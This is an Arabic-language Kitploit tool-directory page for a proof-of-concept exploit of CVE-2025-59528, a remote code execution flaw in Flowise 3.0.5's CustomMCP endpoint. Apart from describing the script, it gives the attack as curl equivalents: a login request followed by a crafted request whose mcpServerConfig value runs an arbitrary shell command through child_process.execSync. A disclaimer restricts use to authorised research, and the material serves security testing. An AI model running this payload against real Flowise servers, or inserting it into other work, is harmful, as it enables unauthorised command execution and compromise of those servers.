Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 إثبات المفهوم | Kitploit
أدوات/GitHubGitHub/mananispiwpiw/cve-2025-59528-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmananispiwpiw/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 إثبات المفهوم

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-59528 PoC

نص برمجي لإثبات المفهوم بلغة Python لتشغيل مسار RCE الخاص بـ Flowise CustomMCP عبر POST /api/v1/node-load-method/customMCP.

⚠️ للأغراض التعليمية وأبحاث الأمن المصرح بها فقط. تشغيل هذه الأداة ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا لاختبارها يعد غير قانوني.

الإسناد

  • im-soohyun (Kim SooHyun)

التفاصيل

  • PoC لـ CVE-2025-59528
  • الإصدار المتأثر: Flowise 3.0.5
  • الإصدار المُصحح: Flowise 3.0.6
  • المرجع: https://github.com/advisories/GHSA-3gcm-f6qx-ff7p

الملفات

  • poc.py: يطلب إدخال عنوان URL/IP للجهاز، وبروتوكول اختياري عند استخدام مضيف/IP مجرد، والبريد الإلكتروني، وكلمة المرور، والأمر؛ يسجّل الدخول، ويعيد استخدام الكوكيز، ثم يرسل طلب CustomMCP مصممًا ويطبع حالة HTTP والترويسات وجسم الاستجابة بطريقة مشابهة لـ curl -i.

الاستخدام

قم بتشغيل:

root@kitploit:~
python3 poc.py

ثم قدّم:

  • عنوان URL/IP للجهاز، مثل 10.10.11.10 أو http://10.10.11.10 أو https://target.example
  • البروتوكول إذا طُلب منك عند إدخال مضيف/IP مجرد
  • عنوان البريد الإلكتروني
  • كلمة مرور لحساب على مثيل Flowise الهدف
  • الأمر الذي تريد تنفيذه على الخادم

ما يعادل curl

الطلب الأول

root@kitploit:~
curl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"email":"<[email protected]>","password":"<password>"}'

الطلب الثاني

root@kitploit:~
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
  -H "Content-Type: application/json" \
  -H "x-request-from: internal" \
  -H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
  -d '{
        "loadMethod":"listActions",
        "inputs":{
          "mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
        }
      }'
تنزيل الأداة